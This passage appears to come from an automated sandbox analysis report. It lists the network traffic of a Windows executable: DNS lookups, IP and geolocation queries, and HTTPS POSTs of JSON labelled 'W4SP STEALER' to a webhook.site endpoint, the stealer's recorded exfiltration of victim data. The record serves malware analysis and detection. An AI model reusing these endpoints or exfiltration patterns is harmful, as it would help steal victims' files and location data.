Apr 4, 2023 09:04:17.856184006 CEST	443	49718	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:17.896030903 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:17.896085978 CEST	443	49718	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:17.918057919 CEST	443	49718	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:17.918196917 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:17.919039011 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:18.753472090 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:18.753559113 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:18.753657103 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:18.755985975 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:18.756028891 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:18.812743902 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:18.878396988 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:18.878462076 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:18.880774975 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:18.880851984 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:18.880954981 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:19.013983011 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:19.014025927 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:19.014260054 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:19.014271021 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:19.014286995 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:19.014384985 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:19.014403105 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:19.093770027 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:19.204597950 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:19.204722881 CEST	443	49719	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:19.204823017 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:19.206918955 CEST	49719	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:21.276468039 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:21.276523113 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:21.276623011 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:21.277901888 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:21.277930975 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.241270065 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.242371082 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:29.242427111 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.244520903 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.244699001 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:29.246022940 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:29.246052980 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.246274948 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.246346951 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:29.246365070 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.303311110 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:29.303369999 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.490767956 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:29.648514986 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.648648977 CEST	443	49720	173.231.16.75	192.168.2.6
Apr 4, 2023 09:04:29.648734093 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:29.649449110 CEST	49720	443	192.168.2.6	173.231.16.75
Apr 4, 2023 09:04:29.807679892 CEST	49721	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:29.807754993 CEST	443	49721	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:29.807827950 CEST	49721	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:29.808697939 CEST	49721	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:29.808725119 CEST	443	49721	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:29.920407057 CEST	443	49721	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:29.921118975 CEST	49721	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:29.921195030 CEST	443	49721	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:29.923921108 CEST	443	49721	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:29.924190998 CEST	49721	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:29.926119089 CEST	49721	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:29.926163912 CEST	443	49721	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:29.926343918 CEST	49721	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:29.926371098 CEST	443	49721	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:29.926466942 CEST	443	49721	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:29.967092037 CEST	443	49721	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:29.967297077 CEST	49721	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:29.979314089 CEST	49721	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:30.673103094 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:30.673168898 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:30.673300982 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:30.674649000 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:30.674707890 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:30.732645035 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:30.733197927 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:30.733237982 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:30.734564066 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:30.734685898 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:30.736299038 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:30.736323118 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:30.736514091 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:30.736557007 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:30.736567974 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:30.736637115 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:30.736649036 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:30.803281069 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:31.074378967 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:31.074517965 CEST	443	49722	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:31.074639082 CEST	49722	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:31.075161934 CEST	49722	443	192.168.2.6	46.4.105.116

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2023 09:04:12.299247980 CEST	58595	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:12.336793900 CEST	53	58595	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:12.528014898 CEST	56331	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:12.557434082 CEST	53	56331	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:13.669354916 CEST	50506	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:13.673154116 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:13.691076994 CEST	53	50506	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:13.697818041 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:14.080962896 CEST	59082	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:14.107356071 CEST	53	59082	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:15.246654987 CEST	59504	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:15.267307043 CEST	53	59504	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:15.632936001 CEST	65198	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:15.659617901 CEST	53	65198	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:15.928702116 CEST	62910	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:15.957986116 CEST	53	62910	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:16.832874060 CEST	63863	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:16.853985071 CEST	53	63863	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:17.706053972 CEST	63229	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:17.729876041 CEST	53	63229	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:18.655487061 CEST	62538	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:18.691370964 CEST	53	62538	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:21.234363079 CEST	54903	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:21.269403934 CEST	53	54903	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:29.790865898 CEST	51530	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:29.806058884 CEST	53	51530	8.8.8.8	192.168.2.6
Apr 4, 2023 09:04:30.650415897 CEST	56122	53	192.168.2.6	8.8.8.8
Apr 4, 2023 09:04:30.670967102 CEST	53	56122	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 4, 2023 09:04:12.299247980 CEST	192.168.2.6	8.8.8.8	0xaf86	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:12.528014898 CEST	192.168.2.6	8.8.8.8	0x640a	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:13.669354916 CEST	192.168.2.6	8.8.8.8	0x6479	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:13.673154116 CEST	192.168.2.6	8.8.8.8	0xd507	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:14.080962896 CEST	192.168.2.6	8.8.8.8	0xce21	Standard query (0)	webhook.site	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:15.246654987 CEST	192.168.2.6	8.8.8.8	0x389c	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:15.632936001 CEST	192.168.2.6	8.8.8.8	0xfce6	Standard query (0)	webhook.site	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:15.928702116 CEST	192.168.2.6	8.8.8.8	0x7d01	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:16.832874060 CEST	192.168.2.6	8.8.8.8	0x2da4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:17.706053972 CEST	192.168.2.6	8.8.8.8	0xe69f	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:18.655487061 CEST	192.168.2.6	8.8.8.8	0xa11f	Standard query (0)	webhook.site	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:21.234363079 CEST	192.168.2.6	8.8.8.8	0xe8c4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:29.790865898 CEST	192.168.2.6	8.8.8.8	0xe7fa	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:30.650415897 CEST	192.168.2.6	8.8.8.8	0xd140	Standard query (0)	webhook.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 4, 2023 09:04:12.336793900 CEST	8.8.8.8	192.168.2.6	0xaf86	No error (0)	api.gofile.io		51.38.43.18	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:12.336793900 CEST	8.8.8.8	192.168.2.6	0xaf86	No error (0)	api.gofile.io		51.178.66.33	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:12.336793900 CEST	8.8.8.8	192.168.2.6	0xaf86	No error (0)	api.gofile.io		151.80.29.83	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:12.557434082 CEST	8.8.8.8	192.168.2.6	0x640a	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 09:04:12.557434082 CEST	8.8.8.8	192.168.2.6	0x640a	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:12.557434082 CEST	8.8.8.8	192.168.2.6	0x640a	No error (0)	api4.ipify.org		173.231.16.75	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:12.557434082 CEST	8.8.8.8	192.168.2.6	0x640a	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:13.691076994 CEST	8.8.8.8	192.168.2.6	0x6479	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 09:04:13.691076994 CEST	8.8.8.8	192.168.2.6	0x6479	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:13.691076994 CEST	8.8.8.8	192.168.2.6	0x6479	No error (0)	api4.ipify.org		173.231.16.75	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:13.691076994 CEST	8.8.8.8	192.168.2.6	0x6479	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:13.697818041 CEST	8.8.8.8	192.168.2.6	0xd507	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:14.107356071 CEST	8.8.8.8	192.168.2.6	0xce21	No error (0)	webhook.site		46.4.105.116	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:15.267307043 CEST	8.8.8.8	192.168.2.6	0x389c	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:15.659617901 CEST	8.8.8.8	192.168.2.6	0xfce6	No error (0)	webhook.site		46.4.105.116	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:15.957986116 CEST	8.8.8.8	192.168.2.6	0x7d01	No error (0)	api.gofile.io		51.38.43.18	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:15.957986116 CEST	8.8.8.8	192.168.2.6	0x7d01	No error (0)	api.gofile.io		51.178.66.33	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:15.957986116 CEST	8.8.8.8	192.168.2.6	0x7d01	No error (0)	api.gofile.io		151.80.29.83	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:16.853985071 CEST	8.8.8.8	192.168.2.6	0x2da4	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 09:04:16.853985071 CEST	8.8.8.8	192.168.2.6	0x2da4	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:16.853985071 CEST	8.8.8.8	192.168.2.6	0x2da4	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:16.853985071 CEST	8.8.8.8	192.168.2.6	0x2da4	No error (0)	api4.ipify.org		173.231.16.75	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:17.729876041 CEST	8.8.8.8	192.168.2.6	0xe69f	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:18.691370964 CEST	8.8.8.8	192.168.2.6	0xa11f	No error (0)	webhook.site		46.4.105.116	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:21.269403934 CEST	8.8.8.8	192.168.2.6	0xe8c4	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 09:04:21.269403934 CEST	8.8.8.8	192.168.2.6	0xe8c4	No error (0)	api4.ipify.org		173.231.16.75	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:21.269403934 CEST	8.8.8.8	192.168.2.6	0xe8c4	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:21.269403934 CEST	8.8.8.8	192.168.2.6	0xe8c4	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:29.806058884 CEST	8.8.8.8	192.168.2.6	0xe7fa	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Apr 4, 2023 09:04:30.670967102 CEST	8.8.8.8	192.168.2.6	0xd140	No error (0)	webhook.site		46.4.105.116	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

geolocation-db.com

webhook.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49710	64.185.227.155	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	Direction	Data
2023-04-04 07:04:13 UTC	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.10 Connection: close
2023-04-04 07:04:13 UTC	IN	HTTP/1.1 200 OK Content-Length: 14 Content-Type: text/plain Date: Tue, 04 Apr 2023 07:04:13 GMT Vary: Origin Connection: close
2023-04-04 07:04:13 UTC	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 Data Ascii: 102.129.143.44

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49712	159.89.102.253	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	Direction	Data
2023-04-04 07:04:13 UTC	OUT	GET /jsonp/102.129.143.44 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.10 Connection: close
2023-04-04 07:04:13 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 04 Apr 2023 07:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-04-04 07:04:13 UTC	IN	Data Raw: 62 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 22 70 6f 73 74 61 6c 22 3a 22 39 30 30 30 39 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 34 2e 30 35 34 34 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 31 31 38 2e 32 34 34 2c 22 49 50 76 34 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 22 2c 22 73 74 61 74 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: b9callback({"country_code":"US","country_name":"United States","city":"Los Angeles","postal":"90009","latitude":34.0544,"longitude":-118.244,"IPv4":"102.129.143.44","state":"California"})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49721	159.89.102.253	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:29 UTC	5	OUT	GET /jsonp/102.129.143.44 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.10 Connection: close
2023-04-04 07:04:29 UTC	6	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 04 Apr 2023 07:04:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-04-04 07:04:29 UTC	6	IN	Data Raw: 62 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 22 70 6f 73 74 61 6c 22 3a 22 39 30 30 30 39 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 34 2e 30 35 34 34 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 31 31 38 2e 32 34 34 2c 22 49 50 76 34 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 22 2c 22 73 74 61 74 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: b9callback({"country_code":"US","country_name":"United States","city":"Los Angeles","postal":"90009","latitude":34.0544,"longitude":-118.244,"IPv4":"102.129.143.44","state":"California"})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49722	46.4.105.116	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:30 UTC	6	OUT	POST /6ef9c344-b801-4707-b071-bfe96f5a7949 HTTP/1.1 Accept-Encoding: identity Content-Length: 509 Host: webhook.site Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-04-04 07:04:30 UTC	6	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 45 4e 47 49 4e 45 45 52 20 7c 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 31 34 34 30 36 34 31 33 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 57 34 53 50 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 40 57 34 53 50 20 53 54 45 41 4c 45 52 Data Ascii: {"content": ":flag_us: - `user \| 102.129.143.44 (United States)`", "embeds": [{"color": 14406413, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "W4SP \| File Stealer"}, "footer": {"text": "@W4SP STEALER
2023-04-04 07:04:31 UTC	7	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Request-Id: f57bcfa6-81ac-4471-9d71-b97bd7e4937e X-Token-Id: 6ef9c344-b801-4707-b071-bfe96f5a7949 Cache-Control: no-cache, private Date: Tue, 04 Apr 2023 07:04:30 GMT
2023-04-04 07:04:31 UTC	7	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49713	46.4.105.116	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:14 UTC	0	OUT	POST /6ef9c344-b801-4707-b071-bfe96f5a7949 HTTP/1.1 Accept-Encoding: identity Content-Length: 443 Host: webhook.site Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-04-04 07:04:14 UTC	1	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 45 4e 47 49 4e 45 45 52 20 7c 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 57 34 53 50 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 31 35 37 38 31 34 30 33 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 40 57 34 53 50 20 53 54 45 41 4c 45 52 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 39 36 33 31 31 34 33 34 39 38 37 37 31 36 32 30 30 34 2f Data Ascii: {"content": ":flag_us: - `user \| 102.129.143.44 (United States)`", "embeds": [{"title": "W4SP Zips", "description": "\n\n", "color": 15781403, "footer": {"text": "@W4SP STEALER", "icon_url": "https://cdn.discordapp.com/attachments/963114349877162004/
2023-04-04 07:04:14 UTC	1	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Request-Id: ca8b4a31-9e11-4958-9784-b1071b143a3c X-Token-Id: 6ef9c344-b801-4707-b071-bfe96f5a7949 Cache-Control: no-cache, private Date: Tue, 04 Apr 2023 07:04:14 GMT
2023-04-04 07:04:14 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49711	64.185.227.155	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:14 UTC	1	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.10 Connection: close
2023-04-04 07:04:15 UTC	1	IN	HTTP/1.1 200 OK Content-Length: 14 Content-Type: text/plain Date: Tue, 04 Apr 2023 07:04:14 GMT Vary: Origin Connection: close
2023-04-04 07:04:15 UTC	2	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 Data Ascii: 102.129.143.44

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49714	159.89.102.253	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:15 UTC	2	OUT	GET /jsonp/102.129.143.44 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.10 Connection: close
2023-04-04 07:04:15 UTC	2	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 04 Apr 2023 07:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
